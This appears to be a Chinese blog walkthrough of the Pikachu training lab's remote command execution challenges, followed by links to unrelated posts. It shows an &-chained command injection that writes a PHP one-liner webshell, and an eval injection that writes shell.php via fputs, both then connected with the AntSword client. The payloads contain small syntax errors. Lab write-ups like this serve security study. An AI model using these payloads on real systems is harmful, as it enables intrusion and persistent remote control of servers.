Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POSTcmd);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST"cmd")?>');

3.蚁剑连接

相关推荐
AOwhisky5 小时前
Python 学习笔记(第十五期)——运维自动化(下·后篇):堡垒机实战——paramiko高阶篇
运维·python·学习·云原生·自动化·运维开发
重生的黑客5 小时前
Linux 进程优先级、切换与调度:从孤儿进程到 O(1) 调度模型
linux·运维·服务器·进程优先级·nice
Urbano5 小时前
夹克与商务单西口袋工序自动化技改研究报告
运维·自动化
骑上单车去旅行7 小时前
MD5校验对比脚本
linux·服务器·windows
期待着20137 小时前
docker 安装 ,在centos7.9
运维·docker·容器
踏月的造梦星球7 小时前
DM8 DSC 单机双实例部署
运维·开发语言·数据库
小程故事多_808 小时前
算力工厂与安全沙箱,企业AI规模化落地的两条核心生命线
人工智能·安全
MXsoft6188 小时前
平台化是智能运维发展的必然趋势吗?
运维
ShirleyWang0128 小时前
让headlamp控制台能访问
linux·服务器·python·k8s·k3s
liuccn8 小时前
Linux 存储系统:LVM 与直接分区
linux·运维